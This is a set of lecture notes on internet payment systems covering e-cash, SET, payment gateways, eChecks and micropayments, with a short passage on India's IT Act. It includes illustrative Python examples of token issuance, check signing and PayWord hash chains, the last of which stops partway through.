Section 69 empowers the Central Government, a State Government or their authorised agency to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient to do so in the interest of the sovereignty or integrity of India, defence of India, security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence, or for the investigation of any offence. Subscribers, intermediaries and persons in charge of a computer resource can also be compelled to assist in decrypting data, with imprisonment for refusal.

Section 66A is widely criticised. It has led to numerous abuses reported by the press, and its constitutional validity has been challenged in the Lucknow and Madras High Courts. Based on Section 66A, the Bombay High Court has held that creating a website and storing false information on it can constitute a cyber crime. Section 66A was later struck down in its entirety as unconstitutional by the Supreme Court of India in Shreya Singhal v. Union of India (24 March 2015), so the penalties quoted for it above no longer apply.

Page 2: Web technology and commerce unit 4

PREPARED BY ARUN PRATAP SINGH 1

1

INTERNET PAYMENT SYSTEM

Internet payment systems refer to the various methods by which individuals and companies doing

business online collect money from their customers in exchange for the goods and services they

provide A number of different forms of payment exist for online purchases and more are being

developed all the time After all it is in the best interest of both consumers and merchants to make

electronic commerce as safe and easy as possible The low cost of entry has attracted hundreds

of companies large and small to the level playing field of cyberspace Paul J Dowling Jr noted

in his book Web Advertising and Marketing On the Internet a small one-man operation can look

as good or better than a large multinational corporation But whether its an individual working

out of a virtual office or a CEO sitting in an expensive downtown office building theyre going

online for one purposemdashto sell And theyre leaving no stone unturned in their efforts to make it

safe and easy for their customers to buy

Customers who physically visit retail establishments can choose among a variety of payment

methods including cash checks credit cards and debit cards Customers who shop on the

Internet are beginning to expect online merchants to offer the same variety and convenience in

payment terms Credit cards remain the most common form of payment for online purchases

although the options have expanded to include digital cash smart cards electronic checks and

other technologies In addition some customers continue to make online purchases using

traditional payment methods such as placing orders by telephone or fax or sending a check

via snail mail Dowling recommends that companies conducting sales online make as many

payment methods available as possible and advertise their acceptance of those methods on their

Web sites He claims that small businesses can add value to their product or service offerings by

making payment easy comfortable and secure for their customers Getting paid on the Web

ultimately testifies to your marketing plans effectiveness Dowling wrote And when everything

goes as it should customers will place the order

Perhaps the biggest issue affecting online payment systemsmdashfrom both the sellers and the

buyers perspectivesmdashis maintaining the security of financial information sent over the Internet A

survey conducted by Visa showed that 91 percent of consumers were concerned about privacy

and security on the Internet Another study conducted by the Boston Consulting Group and

quoted in Computerworld indicated that 28 percent of consumers online purchase efforts failedmdash

meaning that they intended to buy online but did not complete the transaction Concerns about

security and the perception that online credit card transactions are extremely unsafe seem to be

among the biggest issues keeping many retailers and consumers from closing sales

electronically Lorna Pappas wrote in Chain Store Age Executive

Internet payment system is also known as Electronic Payment system

What Electronic Payment system is

Electronic Payment is a financial exchange that takes place online between buyers and sellers

The content of this exchange is usually some form of digital financial instrument (such as

encrypted credit card numbers electronic cheques or digital cash) that is backed by a bank or an

intermediary or by a legal tender

Electronic payment system is a system which helps the customer or user to make online payment

for their shopping

UNIT IV

PREPARED BY ARUN PRATAP SINGH 2

2

Requirements For E-payments

The various factors that have lead the financial institutions to make use of electronic payments

are

1 Decreasing technology cost The technology used in the networks is decreasing day by

day

2 Reduced operational and processing costDue to reduced technology cost the processing

cost of various commerce activities becomes very less A very simple reason to prove this

is the fact that in electronic transactions we save both paper and time

3 Increasing online commerce

Some Examples Of EPS-

Online Reservation

Online Bill Payment

Online Order Placing (Nirulas)

Online Ticket Booking ( Movie)

Major Internet Payment Methods

Secure Electronics Transaction (SET) Protocol for implementing credit card payment

An Electronic Check system for supporting check payment

An Electronic funds transfer and Electronic Cash system for emulating physical cash

payment

Other methods

bull Micropayment methods and Smart card methods

Two Storage Methods

On-line

Individual does not have possession personally of electronic cash

Trusted third party eg online bank holds customersrsquo cash accounts

Off-line

Customer holds cash on smart card or software wallet

Fraud and double spending require tamper-proof encryption

PREPARED BY ARUN PRATAP SINGH 3

3

E-Cash

A system that allows a person to pay for goods or services by transmitting a number

from one computer to another

Like the serial numbers on real currency notes the E-cash numbers are unique

This is issued by a bank and represents a specified sum of real money

It is anonymous and reusable

Electronic Cash Security

Complex cryptographic algorithms prevent double spending

Anonymity is preserved unless double spending is attempted

Serial numbers can allow tracing to prevent money laundering

E-Cash Processing

PREPARED BY ARUN PRATAP SINGH 4

4

E-Wallet

The E-wallet is another payment scheme that operates like a carrier of e-cash and other

information

The aim is to give shoppers a single simple and secure way of carrying currency

electronically

Trust is the basis of the e-wallet as a form of electronic payment

Procedure for using an e-wallet

1 Decide on an online site where you would like to shop

2 Download a wallet from the merchantrsquos website

3 Fill out personal information such as your credit card number name address and phone

number and where merchandise should be shipped

4 When you are ready to buy click on the wallet button the buying process is fully

executed

PREPARED BY ARUN PRATAP SINGH 5

5

Smart Cards

A smart card is any pocket-sized card with embedded integrated circuits which can

process data

This implies that it can receive input which is processed and delivered as an output

Smart card Processing

PREPARED BY ARUN PRATAP SINGH 6

6

Smart Card Applications ndash

Ticketless travel

Seoul bus system 4M cards 1B transactions since 1996

Planned the SF Bay Area system

Authentication ID

Medical records

Ecash

Store loyalty programs

Personal profiles

Government

Licenses

Mall parking

Credit cards

It is a Plastic Card having a Magnetic Number and code on it

It has Some fixed amount to spend

Customer has to repay the spend amount after sometime

PREPARED BY ARUN PRATAP SINGH 7

7

Processing a Credit cards payment ndash

Risk in using Credit cards -

Operational Risk

Credit Risk

Legal Risk

Secure Electronic Transaction (SET) Protocol

Jointly designed by MasterCard and Visa with backing of Microsoft Netscape IBM

GTE SAIC and others

Designed to provide security for card payments as they travel on the Internet

Contrasted with Secure Socket Layers (SSL) protocol SET validates consumers

and merchants in addition to providing secure transmission

SET specification

Uses public key cryptography and digital certificates for validating both

consumers and merchants

PREPARED BY ARUN PRATAP SINGH 8

8

Provides privacy data integrity user and merchant authentication and consumer

nonrepudiation

The SET Protocol

What Is Payment Gateways

A payment gateway is an e-commerce application service provider service that

authorizes payments for e-businesses online Shopping etc

PREPARED BY ARUN PRATAP SINGH 9

9

Payment gateway protects credit cards details encrypting sensitive information such

as credit card numbers to ensure that information passes securely between the

customer and the merchant and also between merchant and payment processor

How It works

Payments In India

Going the e-way

e-PAYMENT SYSTEM IN INDIA

bull Ever-increasing technology changes

bull Growing Internet access and mobile subscriber base

bull Rising consumer confidence

bull Convenient deliverypayment models

bull India has been one of the fastest growing country for payment cards in the Asia-Pacific

region

bull India currently has approximately 130 million cards (both debit and credit) in circulation

PREPARED BY ARUN PRATAP SINGH 10

10

GROWTH IN e-PAYMENT SYSTEM

REGULATION-

The Reserve Bank of India (RBI) has been supportive in the development of electronic

payments

In this direction the ldquoPayments and Settlement System Actrdquo was enacted

Apart from being supporting the RBI has also initiated various programs to encourage e-

payments

CHANNELS OF PAYMENT-

Indian banks have put in place various channels of electronic payments in place to

encourage customers to adopt the electronic mode

Channels like the Internet mobile ATMs and drop boxes are some of the most

frequently used channels apart from bank branches

MARKET MAPPING-

E-payments processing market has two major players namely

Tech Process and Bill Desk which is a pure play electronic transaction processing company

The Indian Payment System Is Transforming From Paper Mode To Electronic Mode

Two main reasons for such shift are-

PREPARED BY ARUN PRATAP SINGH 11

11

1 The regulator has mandated routing all high-value transactions electronically to minimize

movement of money and risk

2 At the retail end customers are realizing the efficiency of electronic payments

SHIFTS IN THE PAYMENT SYSTEM

TECHNOLOGICAL ADVANCEMENT IN e-PAYMENT

bull Electronic Clearing Service (Credit and Debit)

bull National Electronic Fund Transfer (NEFT)

THE RULING PLASTIC MONEY

Credit cards

Debit cards

ATM Cards

PayPal

PayPal is a global e-commerce business allowing payments and money transfers to be made

through the Internet Online money transfers serve as electronic alternatives to paying with

traditional paper methods such as checks and money orders It is subject to the US economic

sanction list and other rules and interventions required by US laws or government PayPal is an

acquirer performing payment processing for online vendors auction sites and other commercial

PREPARED BY ARUN PRATAP SINGH 12

12

users for which it charges a fee It may also charge a fee for receiving money proportional to the

amount received The fees depend on the currency used the payment option used the country

of the sender the country of the recipient the amount sent and the recipients account type In

addition eBay purchases made by credit card through PayPal may incur extra fees if the buyer

and seller use different currencies On October 3 2002 PayPal became a wholly owned

subsidiary of eBay Its corporate headquarters are in San Jose California United States at eBays

North First Street satellite office campus The company also has significant operations in Omaha

Scottsdale Charlotte and Austin in the United States Chennai in India Dublin in Ireland

Kleinmachnow in Germany and Tel Aviv in Israel From July 2007 PayPal has operated across

the European Union as a Luxembourg-based bank

Google Wallet

Google Wallet was launched in 2011 serving a similar function as PayPal to facilitate payments

and transfer money online It also features highly robust security and additional features such as

the ability to send payments as attachments via email

PREPARED BY ARUN PRATAP SINGH 13

13

CHARACTERISTICS OF PAYMENT SYSTEM

There is no paper involved so electronic payments can be effected directly from home or office

Fast efficient safe secure and generally less costly than paper-based alternatives eg cheques

Electronic payments are fully traceable

In Ireland the clearing time for standard electronic payments is next day value for interbank

transfers subject to the payment instruction being received ahead of lsquoshut-offrsquo times which can

vary from bank to bank Payment instructions received after the lsquoshut-offrsquo time will be processed

one working day later

Most banks offer same day value for payments made to other accounts held in that same bank

Many banks offer same day money transfer inter-bank services for large value payments

Unlike cheques electronic payments donrsquot lsquobouncersquo ndash as payments will not be effected unless the

funds are available in the first place

PREPARED BY ARUN PRATAP SINGH 14

14

Features of Payment Methods

bull Anonymity whether the payment method is anonymous

bull Security whether the payment method is secure

bull Overhead cost the overhead cost of processing a payment

bull Transferability whether a payment can be carried out without the involvement of a

third party

bull Divisibility whether a payment can be divided into arbitrary small payments whose

sum is equal to the original payment

bull Acceptability whether the payment method is supported globally

4C PAYMENTS METHODS

To make the e-commerce system functional we also need to incorporate payment

functions into the system

In the physical world there are 4 types of payment methods

bull Cash

bull Credit card

bull Check

bull Creditdebit (Fund Transfer)

bull Payment method should be

ndash Very secure

ndash Having Low overhead cost

ndash Transferable

ndash Acceptable anywhere

ndash Divisible

ndash Anonymous

Comparison of the 4C payment methods

PREPARED BY ARUN PRATAP SINGH 15

15

SET PROTOCOL FOR CREDIT CARD PAYMENT

bull The credit card is one of the most commonly used payment methods in e-commerce in particular B2C e-commerce

bull Before the introduction SET protocol secure credit card payment was usually carried out over an SSL connection

Advantage of SSL

bull It ensures the secure transmission of credit card information over the internet

Disadvantage of SSL

bull It is not a complete credit card payment method

bull For example it cannot support on-line credit card authorization

SET is specially developed to provide secure credit card payment over the internet

It is now widely supported by major credit card companies including Visa and

MasterCard

PREPARED BY ARUN PRATAP SINGH 16

16

bull SET aims at satisfying the following security requirements in the context of credit card

payment

ndash Confidentiality - Sensitive messages are encrypted so that they are kept

confidential

ndash Integrity - Nearly all messages are digitally signed to ensure content integrity

ndash Authentication - Authentication is performed through a public key infrastructure

SET network architecture

Merchant a seller which is connected to an acquirer

Cardholder a registered holder of the credit card who is a buyer

Issuer the bank that issues the credit card to a cardholder

Acquirer the bank that serves as an ldquoagentrdquo to link a merchant to multiple issuers

bull A merchant can process various credit cards through a single acquirer

bull Payment Gateway This is typically connected to the acquirer

ndash The payment gateway is situated between the SET system and the financial

network of the current credit card system for processing the credit card payment

SET Digital Certificate System

PREPARED BY ARUN PRATAP SINGH 17

17

Dual signature generation and verification ndash

bull In the physical credit card system

ndash the Payment Instructions (PI) including the cardholderrsquos credit card number and

signature are not kept confidential

ndash data integrity can basically be ensured by using printed receipts

ndash cardholderrsquos authentication relies on simple signature checking only

bull In an electronic credit card system

ndash the Order Information (OI) and PI can be digitally signed to ensure data integrity

ndash the sensitive credit card information may still be disclosed to other people

bull SET introduces a novel method called the dual signature (DS) to ensure data integrity

while protecting the sensitive information

PREPARED BY ARUN PRATAP SINGH 18

18

How the merchant and the payment gateway can verify the DS

bull The merchant is provided with OI H[PI] and DS

bull The dual signature can be verified as follows

Step 1 The merchant first finds

H[ H[PI] || H[OI] ]

Step 2 He then decrypts the digital signature with the cardholderrsquos public signature key as

follows

DRSA[ DS | keypublic_sign cardholder ]

Where

keypublic_sign cardholder public signature key of the cardholder

PREPARED BY ARUN PRATAP SINGH 19

19

Step 3 Finally he compares the two terms H[H[PI] || H[OI]] and

DRSA[DS | keypublic_signcardholder ]

They should be the same if the transmitted DS has not been changed otherwise the order is

not valid

The payment gateway is provided with PI H[OI] and DS

By using the dual signature method each cardholder can link OI and PI while releasing

only the necessary information to the relevant party

If either the OI or PI is changed the dual signature will no longer be valid

DIGITAL ENVELOPE ndash

PREPARED BY ARUN PRATAP SINGH 20

20

SET PROTOCOL ndash

SET protocol has four phases initiation purchase authorization and capture

First the cardholder sends a purchase initiation request to the merchant for initializing

the payment

Then the merchant returns a response message to the cardholder

In the second phase the cardholder sends the purchase order together with the

payment instruction to the merchant

In the third phase the merchant obtains the authorization from the issuer via the

payment gateway

Finally the merchant requests a money transfer to its account

E-CASH

Electronic money is paperless cash This money is either stored on a card itself or in an account

associated with the card

The most common examples are transit cards meal plans and PayPal E-Cash can also mean

any kind of electronic payment

Electronic payment systems come in many forms including virtual cheques ATM cards credit

cards and stored value cards The usual security features for such systems are privacy

authenticity and no repudiation

There are four major components in an electronic cash system

Issuers

Customers

Merchants or traders

Regulators

Issuers can be banks or non-bank institutions

PREPARED BY ARUN PRATAP SINGH 21

21

customers are referred to users who spend E-Cash

Merchants and traders are vendors who receive E-Cash

regulators are defined as related authorities or state tax agencies

For an E-Cash transaction to occur we need to go through at least three stages

Account Setup Customers will need to obtain E-Cash accounts through certain issuers

Merchants who would like to accept E-Cash will also need to arrange accounts from

various E-Cash issuers Issuers typically handle accounting for customers and

merchants

Purchase Customers purchase certain goods or services and give the merchants

tokens which represent equivalent E-Cash Purchase information is usually encrypted

when transmitting in the networks

Authentication Merchants will need to contact E-Cash issuers about the purchase and

the amount of E-Cash involved E-Cash issuers will then authenticate the transaction

and approve the amount E-Cash involved

E-cash payment system ndash

For accessing the services online e-cash is a prime method for secure online payments

The following model shows how e cash payment system works

PREPARED BY ARUN PRATAP SINGH 22

22

This is a simple model of E-cash payment system This gives us the idea of how e-cash

payment system works The model is explained properly in upcoming slides

The customer approaches his issuer's (bank's) site to access his account. The issuer in return issues the money in the form of tokens, generally in denominations of tens and hundreds or as specified by the customer.

In the second phase, the customer endorses those tokens to the merchant to acquire services, for which the customer authenticates the payment to the trader.

In the third phase, the trader approaches the token issuer (the customer's bank) and, after authenticating the tokens, the issuing bank converts the tokens into electronic funds, which are transferred into the trader's account.

Finally, after receiving payment for the respective services, the trader provides the requisite service or product and also notifies the customer that the payment made by the customer into the trader's account has been approved.

A system that allows a person to pay for goods or services by transmitting a number from one computer to another. Like the serial numbers on real currency notes, the E-cash numbers are unique. This is issued by a bank and represents a specified sum of real money. It is anonymous and reusable.

Electronic Cash Security

Complex cryptographic algorithms prevent double spending

Anonymity is preserved unless double spending is attempted

Serial numbers can allow tracing to prevent money laundering
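The three stages of the model above (account setup, purchase, authentication) and the issuer-side double-spending check can be seen in the following added example. It is not code from the notes or from any real e-cash product: the issuer authenticates its own tokens with an HMAC over (serial number, amount) under a key only it holds, so a merchant must present a token back to the issuer to have it verified, exactly as the authentication stage describes. The account names, balances and amounts are constructed sample values. A real scheme would use digital signatures (often blind signatures, which is what gives the anonymity the notes mention); HMAC is used here only because it needs no third-party library.

```python
"""Added example: token-based e-cash with issuer-side double-spend detection.
Not the notes' own code; HMAC stands in for the issuer's signature."""
from __future__ import annotations

import hashlib
import hmac
import secrets
from dataclasses import dataclass


@dataclass(frozen=True)
class Token:
    serial: str   # unique, like the serial number on a banknote
    amount: int   # value in the smallest currency unit (constructed: cents)
    tag: str      # issuer's authentication tag (hex)


class Issuer:
    """Bank or non-bank institution that issues and later authenticates E-Cash."""

    def __init__(self, key: bytes):
        self._key = key                      # assumption: held only by the issuer
        self.accounts: dict[str, int] = {}   # account setup stage
        self._spent: set[str] = set()        # serial numbers already redeemed

    def open_account(self, name: str, balance: int) -> None:
        self.accounts[name] = balance

    def _tag(self, serial: str, amount: int) -> str:
        msg = f"{serial}:{amount}".encode()
        return hmac.new(self._key, msg, hashlib.sha256).hexdigest()

    def withdraw(self, customer: str, amount: int) -> Token:
        """Issue a token: debit the customer's account and mint a fresh serial."""
        if self.accounts.get(customer, 0) < amount:
            raise ValueError("insufficient funds")
        self.accounts[customer] -= amount
        serial = secrets.token_hex(16)
        return Token(serial, amount, self._tag(serial, amount))

    def redeem(self, merchant: str, token: Token) -> bool:
        """Authentication stage: verify the tag, reject double spending, credit merchant."""
        expected = self._tag(token.serial, token.amount)
        if not hmac.compare_digest(expected, token.tag):
            return False                     # forged or altered token
        if token.serial in self._spent:
            return False                     # same serial presented twice
        self._spent.add(token.serial)
        self.accounts[merchant] = self.accounts.get(merchant, 0) + token.amount
        return True


def run_purchase_flow() -> tuple[bool, bool, bool, int, int]:
    """Walk through one purchase, a replay of the same token, and a tampered token.

    Returns (first_redeem_ok, replay_ok, tampered_ok, customer_balance, merchant_balance).
    """
    issuer = Issuer(key=secrets.token_bytes(32))
    issuer.open_account("alice", 1000)            # constructed sample balances
    issuer.open_account("shop", 0)

    token = issuer.withdraw("alice", 250)         # purchase stage: alice hands token to shop
    first = issuer.redeem("shop", token)          # shop asks the issuer to authenticate it
    replay = issuer.redeem("shop", token)         # the same token presented a second time
    forged = Token(token.serial, 999, token.tag)  # amount altered, tag no longer matches
    tampered = issuer.redeem("shop", forged)
    return first, replay, tampered, issuer.accounts["alice"], issuer.accounts["shop"]


if __name__ == "__main__":
    print(run_purchase_flow())   # (True, False, False, 750, 250)
```

The issuer keeps the set of spent serial numbers for the life of the tokens; that store, not the token format, is what makes the second presentment detectable, which is why the authentication stage has to go back to the issuer rather than being done by the merchant alone.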

E-Cash Processing

E-cash security

Security is of extreme importance while handling online transactions. Faith in the security of the medium of exchange, whether paper or digital, is essential for the economy to function.

E-cash is more secure than other online payment modes because in this case no credential such as a card password is involved. It is simply an online fund transfer from the customer's account to the trader's account.


However, while accessing the customer's account, the customer must keep in mind internet security sweeps or theft. Online hacking and cracking can be avoided by using SSL and TLS website security systems, keeping the website link on the safe "https" protocol, and using proper internet security software to keep aside the threats of malware, eavesdropping and other security threats.

Advantages

We can transfer funds, purchase stocks and use a variety of other services without having to handle physical cash or cheques.

Electronic cash protects its user against theft. With electronic cash, the customer does not need to provide financial information.

E-cash supports small payments. Other online payment systems charge a fee for every transaction no matter how high or low it is, but e-cash has a specific limit for additional charges, which is why very low payments are not charged a fee.

Limitations

However secure the e-cash payment system may be, no one is safe against online fraud. In this case the trader is the fraudulent party: the trader may take the amount but not provide the services.

While making the payment it is very important that the internet connection and power supply remain active. If the payment is in process and the internet connection fails in between, it can lead to loss of information, i.e. the amount will be charged but will not reach the trader, and the refund takes a very long time; in general the refund time is at least 30-45 days.

E-Cash is not for everyone. Low income segments without computer and internet access are unable to enjoy the usage of E-Cash.

The rise of E-Cash is inevitable, but further improvements are needed. Tackling security, anonymity, low income group readiness and technology reliability issues will bring E-Cash closer to perfect. Countries such as India, where people were hesitant to use such methods, have shown tremendous use of online payments and the E-cash payment system. Slowly but steadily the growth is seen, and improving it technologically will make it more reliable and efficient for customers to use.


E-CHECK

What is an electronic check?

It's simply an electronic version of a paper check. When you convert a traditional check into an electronic payment, you can process it through the Automated Clearing House (ACH) Network to save time and money—and because electronic checks have more security features than a paper check, they better protect your business and customers. Another way to think of an electronic check is when a customer pays by entering their bank account information online and electronically sending the money. Electronic checks are becoming increasingly popular because they are so fast, efficient and secure. Electronic checks are sometimes called eChecks, electronic check conversions or Back Office Conversions (BOCs). Read more on what you need to know as you consider using eChecks in your business.

eCheck, a new payment instrument combining the security, speed and processing efficiencies of all-electronic transactions with the familiar and well-developed legal infrastructure and business processes associated with paper checks, is the first and only electronic payment mechanism chosen by the United States Treasury to make high-value payments over the public Internet.

How electronic checks work

The process is simple. First, you run a customer's paper check through an electronic scanner system supplied by your merchant service provider. This virtual terminal captures the customer's banking information and the payment amount. The information is then transferred electronically over the Federal Reserve Bank's ACH Network, which takes the funds from your customer's account and deposits them into yours. After payment approval, the virtual terminal will print a receipt for the customer to sign and keep. Your employee should then void the paper check and return it to the customer. You'll be able to view and report on your merchant transactions online, although features may vary depending on your merchant service provider or your payment processing solution provider.

How does the ACH Network work with eChecks?

The ACH Network is a funds distribution system that moves funds electronically from one entity to another. It's a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed). Given its ability to electronically transfer money directly to and from bank accounts, ACH is a faster payment method than traditional paper checks. The ACH payment process is close to the paper check process, only faster. Clients give their bank routing or checking account number and, after verification, the payment is transferred almost immediately and electronically through the ACH system. Besides checks, the ACH Network also handles debit card transactions, direct deposits of payroll, Social Security and other government benefits, direct debit payments and business-to-business payments.


Reaping the benefits of eChecks

Converting your customers' paper checks into electronic checks helps save time and reduces hassle for your staff because you can submit payments electronically instead of making trips to the bank. However, time saving and hassle reduction are not the only benefits. Read on for more.

1. Reduce processing costs by up to 60%. eChecks require less manpower to process and don't come with any deposit or transaction fees. As a result, processing an eCheck is generally much cheaper than processing a paper check or credit card transaction.

2. Receive funds sooner. Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing. Billing companies often receive payments within one day.

3. Increase sales. If your business doesn't accept paper checks, offering eChecks expands your customers' options and can increase sales. If you're converting from paper checks to eChecks, you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud.

4. Work smarter and greener. Electronic check conversion is easy to set up. It relies on the trusted ACH Network. And eChecks help reduce the more than 674 million gallons of fuel used and 36 million tons of greenhouse gas emissions created by transporting paper checks.

5. Decrease errors and fraud. eChecks reduce the potential for errors and fraud because fewer people handle them. Merchant service providers also maintain, monitor and check files against negative account databases that store information about individuals or companies that have records of fraud.

Protecting your businessmdashand your customers

Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features.

1. Authentication. Merchants must verify that the person providing the checking account information has the authority to use that account. Authentication services and products available to merchants include digital signatures and public key cryptography. Also known as digital certificates, digital signatures encrypt data in a way that gives the receiver a more reliable indication that the information was actually sent by the sender. They're used on the Internet to confirm the identity of a customer, much as a handwritten signature would. Because digital signatures are difficult to tamper with or imitate and are easily transportable, they're a good way to verify identity. Digital signatures are often used to implement electronic signatures, which include any electronic data that carries the intent of a signature. Public key cryptography is a security method that uses keys to encrypt and decrypt a sent message. With electronic check conversion, the private key is a secret mathematical calculation used to create the digital signature on the echeck, and the public key is the key given to anyone who needs to verify that the sender signed the echeck and that the electronic transfer has not been tampered with.

2. Duplicate detection. Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks.

3. Encryption. The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL).

How to get started with electronic checks

Here's how to implement electronic check conversion as quickly and easily as possible.

1. Choose a well-established processing company. Good pricing is important, but working with a reliable processor is essential.

2. Notify your customers that your business will begin using electronic check conversion. Federal laws require you to post a notification about this change and give your customers a takeaway copy. You must also provide customers with a phone number to request more information.

3. Look for a processor that makes it easy to align your current business processes with your new electronic processing system, export customer data and integrate your new system with your business management software.

4. QuickBooks Payments offers a complete payment processing solution. Businesses can take payments from their customers in many ways, from ACH bank payments and electronic checks to credit cards including Visa, MasterCard, Discover and American Express. In addition to offering many ways to get paid, QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button. Our data shows us that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature.

This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service:

1. Payer (customer/bill payer) is prompted to authorize electronic debit, enter bank routing number (ABA) and account number.

2. Merchant's sales system securely transfers order information to CyberSource over the Internet.

3. CyberSource forwards bank routing number and account number to processor.

4. The routing number and account number are validated and the integrity of the account's checking history is verified. Processor forwards approve/decline results to CyberSource.

5. CyberSource returns approval/decline message to merchant.

6. If approved, CyberSource routes check for settlement through a processor to the Automated Clearinghouse System (ACH). Funds are deposited in approximately 1-3 business days.
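The two eCheck controls described under "Protecting your business" above, a digital signature made with a private key and verified with the public key, followed by duplicate detection on re-presentment, are shown together in the following added example. It is not code from the notes, from CyberSource or from any eCheck product. The signature scheme is an assumption: a Lamport one-time signature built from SHA-256, chosen because it is a genuine public-key scheme that needs no third-party library (real eCheck systems use X.509 certificates with RSA or ECDSA, but the verify-then-check-for-duplicate logic on the receiving side is the same). The routing number, account number and check number are constructed sample values.

```python
"""Added example: sign an electronic check with a public-key (Lamport) signature,
verify it on the payee side, and reject tampering and duplicate presentment.
Not the notes' own code; check fields are constructed sample data."""
from __future__ import annotations

import hashlib
import json
import secrets

H = hashlib.sha256
BITS = 256   # one key pair per bit of the SHA-256 digest


def keygen() -> tuple[list[tuple[bytes, bytes]], list[tuple[bytes, bytes]]]:
    """Private key: 256 pairs of random secrets; public key: their SHA-256 hashes."""
    sk = [(secrets.token_bytes(32), secrets.token_bytes(32)) for _ in range(BITS)]
    pk = [(H(a).digest(), H(b).digest()) for a, b in sk]
    return sk, pk


def canonical(check: dict) -> bytes:
    """Serialise the check fields in a fixed order so payer and payee hash the same bytes."""
    return json.dumps(check, sort_keys=True, separators=(",", ":")).encode()


def _bit(digest: int, i: int) -> int:
    return (digest >> (BITS - 1 - i)) & 1


def sign(sk, check: dict) -> list[bytes]:
    """Reveal one secret per digest bit. A Lamport key must be used only once."""
    digest = int.from_bytes(H(canonical(check)).digest(), "big")
    return [sk[i][_bit(digest, i)] for i in range(BITS)]


def verify(pk, check: dict, sig: list[bytes]) -> bool:
    """Hash each revealed secret and compare with the public-key half for that bit."""
    if len(sig) != BITS:
        return False
    digest = int.from_bytes(H(canonical(check)).digest(), "big")
    return all(H(sig[i]).digest() == pk[i][_bit(digest, i)] for i in range(BITS))


class Payee:
    """Merchant/bank side: accept a signed check once; reject tampering and re-presentment."""

    def __init__(self) -> None:
        self._seen: set[str] = set()   # duplicate-detection store

    def accept(self, pk, check: dict, sig: list[bytes]) -> str:
        if not verify(pk, check, sig):
            return "rejected: bad signature"
        key = f"{check['routing']}:{check['account']}:{check['check_no']}"
        if key in self._seen:
            return "rejected: duplicate"
        self._seen.add(key)
        return "accepted"


def demo() -> tuple[str, str, str]:
    """First presentment, the same check scanned twice, and an amount altered after signing."""
    sk, pk = keygen()
    check = {"routing": "123456789", "account": "000123456789",   # constructed sample values
             "check_no": 1042, "payee": "Example Store", "amount_cents": 4999}
    sig = sign(sk, check)
    payee = Payee()
    first = payee.accept(pk, check, sig)
    again = payee.accept(pk, check, sig)
    altered = dict(check, amount_cents=49999)
    forged = payee.accept(pk, altered, sig)
    return first, again, forged


if __name__ == "__main__":
    print(demo())   # ('accepted', 'rejected: duplicate', 'rejected: bad signature')
```

The duplicate key is built from routing number, account number and check number rather than from the signature bytes, because a re-presented check carries the same valid signature: a signature check alone never catches duplicates, which is why the notes list duplicate detection as a separate control.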

Four Different Scenarios of the FSTC E-check System –


MICROPAYMENT METHODS

Traditional payment methods are called macropayment methods. A new type of payment method, known as a micropayment method, is emerging to cater for very low value transactions. Examples:

Millicent (pre-payment/credit based)

PayWord (post-payment)


MICRO PAYMENT IS -

Very small payments made over the Web

Transactions too small for credit cards

Can be as little as a fraction of a cent

An alternative to subscription and advertising

Can go in either direction

A micropayment is an e-commerce transaction involving a very small sum of money in exchange for something made available online, such as an application download, a service or Web-based content.

Micropayments are sometimes defined as anything less than 75 cents and can be as low as a fraction of a cent. A special type of system is required for such payments, which are too small to be feasible for processing through credit card companies.

Here's one scheme for micropayment. The user and seller each establish an account with a third-party service provider who monitors, collects and distributes micropayments. The seller encodes per-fee links inside a Web page. When the user initiates a transaction, payment goes through an Internet wallet account managed by the service provider. Micropayments accumulate until they are collected as single, larger payments. Such a system is helpful when a user wants to make one-time micropayments to multiple sellers. Seller-based accounts are more common for repeat business with an individual enterprise.

Once a common micropayment standard has been established, some experts predict that streaming media sites, music and application downloads, content vendors, sports access sites and other specialized resources will make pay-per-use common online.
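The post-payment example named earlier, PayWord, and the scheme just described (micropayments accumulate and are collected as one larger payment) both rely on the same idea: make each individual payment cheap to verify and settle only once. The following added example, not code from the notes or from the PayWord authors, shows a PayWord-style hash chain. The user commits to the root of a chain, each payment reveals the next link, the vendor verifies it with a single hash, and at the end the vendor redeems one (count, last payword) pair with the broker. Assumptions: the user's commitment is authenticated out of band (PayWord signs it with the user's certificate; that step is omitted), and each payword is worth one fixed unit (constructed: 1 cent).

```python
"""Added example: PayWord-style post-payment hash chain for micropayments.
Not the notes' own code; commitment signing is assumed to happen out of band."""
from __future__ import annotations

import hashlib
import secrets


def sha256(b: bytes) -> bytes:
    return hashlib.sha256(b).digest()


class UserWallet:
    """Builds the chain w_n -> ... -> w_0 and spends paywords w_1, w_2, ... in order."""

    def __init__(self, length: int):
        self.length = length
        seed = secrets.token_bytes(32)          # w_n, never sent
        chain = [seed]
        for _ in range(length):
            chain.append(sha256(chain[-1]))
        # chain[k] = H^k(seed); w_i = chain[length - i], so the root w_0 = chain[length]
        self._chain = chain
        self.spent = 0

    def commitment(self) -> bytes:
        return self._chain[self.length]         # w_0: the only value sent before paying

    def next_payword(self) -> tuple[int, bytes]:
        if self.spent >= self.length:
            raise RuntimeError("chain exhausted; start a new commitment")
        self.spent += 1
        return self.spent, self._chain[self.length - self.spent]


class Vendor:
    """Accepts paywords one hash at a time and redeems only the last one with the broker."""

    def __init__(self, commitment: bytes):
        self.last_index = 0
        self.last_payword = commitment

    def accept(self, index: int, payword: bytes) -> bool:
        # A valid w_i must hash (i - last_index) times back to the last accepted value;
        # an index at or below the last one is a replay and is refused.
        if index <= self.last_index:
            return False
        h = payword
        for _ in range(index - self.last_index):
            h = sha256(h)
        if h != self.last_payword:
            return False
        self.last_index, self.last_payword = index, payword
        return True

    def redeem_claim(self) -> tuple[int, bytes]:
        """One settlement record for the whole session: (count, w_count)."""
        return self.last_index, self.last_payword


def broker_verify(commitment: bytes, count: int, payword: bytes) -> bool:
    """Broker checks the single claim against the user's commitment w_0."""
    h = payword
    for _ in range(count):
        h = sha256(h)
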